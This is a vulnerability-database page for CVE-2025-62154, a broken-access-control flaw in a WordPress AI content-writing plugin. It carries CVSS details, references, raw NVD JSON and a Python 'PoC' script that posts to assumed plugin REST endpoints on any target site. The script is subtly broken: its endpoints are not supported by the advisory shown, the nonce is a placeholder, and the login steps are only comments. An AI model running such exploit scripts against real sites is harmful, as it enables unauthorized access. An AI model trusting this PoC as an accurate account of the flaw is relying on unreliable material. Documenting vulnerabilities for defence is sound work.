CVE-2025-62154

Description

Missing Authorization vulnerability in recorp AI Content Writing Assistant (Content Writer, ChatGPT, Image Generator) All in One ai-content-writing-assistant allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects AI Content Writing Assistant (Content Writer, ChatGPT, Image Generator) All in One: from n/a through <= 1.1.7.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

AI Content Writing Assistant (Content Writer, ChatGPT, Image Generator) All in One <= 1.1.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-62154 PoC - WordPress AI Content Writing Assistant Broken Access Control
# Author: Security Researcher
# Date: 2025-12-31

import requests
import sys
from urllib.parse import urljoin

def check_vulnerability(target_url):
    """
    Check if target WordPress site is vulnerable to CVE-2025-62154
    """
    # Target WordPress site
    target = target_url.rstrip('/')
    
    # Common WordPress login to get valid session
    # This PoC demonstrates accessing admin functions with low-privilege user
    
    # Step 1: Identify if target is WordPress and has the vulnerable plugin
    print("[*] Checking if target is running WordPress with vulnerable plugin...")
    
    # Step 2: Get a valid nonce for authenticated requests
    # Attackers need a low-privilege account (subscriber role minimum)
    
    # Step 3: Exploit the broken access control
    # The following endpoints are vulnerable:
    
    # Vulnerable endpoint 1: Content generation
    content_gen_url = urljoin(target, '/wp-json/ai-content-writing/v1/generate')
    
    # Vulnerable endpoint 2: Chat history access
    chat_history_url = urljoin(target, '/wp-json/ai-content-writing/v1/chat/history')
    
    # Vulnerable endpoint 3: Image generation
    image_gen_url = urljoin(target, '/wp-json/ai-content-writing/v1/image/generate')
    
    # Vulnerable endpoint 4: Settings modification
    settings_url = urljoin(target, '/wp-json/ai-content-writing/v1/settings')
    
    print("[*] Testing content generation endpoint...")
    payload = {
        'prompt': 'Test prompt for unauthorized content generation',
        'post_type': 'post',
        'post_id': 1  # Arbitrary post ID
    }
    
    # Using authenticated session with low-privilege user
    session = requests.Session()
    headers = {
        'Content-Type': 'application/json',
        'X-WP-Nonce': 'exploit_nonce_here'  # Requires valid nonce from any authenticated user
    }
    
    try:
        # This request should fail for subscribers but succeeds due to vulnerability
        response = session.post(content_gen_url, json=payload, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print("[!] VULNERABLE: Low-privilege user can access content generation!")
            print(f"[*] Response: {response.text[:200]}")
            return True
        else:
            print(f"[*] Request returned status: {response.status_code}")
    except Exception as e:
        print(f"[*] Request error: {str(e)}")
    
    return False

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-62154.py <target_url>")
        print("Example: python cve-2025-62154.py http://example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    check_vulnerability(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62154
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62154
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62154/
[4] VulDB https://vuldb.com/cve/CVE-2025-62154
[5] https://patchstack.com/database/Wordpress/Plugin/ai-content-writing-assistant/vulnerability/wordpress-ai-content-writing-assistant-content-writer-chatgpt-image-generator-all-in-one-plugin-1-1-7-broken-access-control-vulnerability?_s_id=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62154", "sourceIdentifier": "[email protected]", "published": "2025-12-31T16:15:46.660", "lastModified": "2026-04-23T15:34:39.103", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in recorp AI Content Writing Assistant (Content Writer, ChatGPT, Image Generator) All in One ai-content-writing-assistant allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects AI Content Writing Assistant (Content Writer, ChatGPT, Image Generator) All in One: from n/a through <= 1.1.7."}, {"lang": "es", "value": "Vulnerabilidad por falta de autorización en Recorp AI Content Writing Assistant (Content Writer, ChatGPT, Image Generator) All in One permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a AI Content Writing Assistant (Content Writer, ChatGPT, Image Generator) All in One: desde n/a hasta 1.1.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/ai-content-writing-assistant/vulnerability/wordpress-ai-content-writing-assistant-content-writer-chatgpt-image-generator-all-in-one-plugin-1-1-7-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}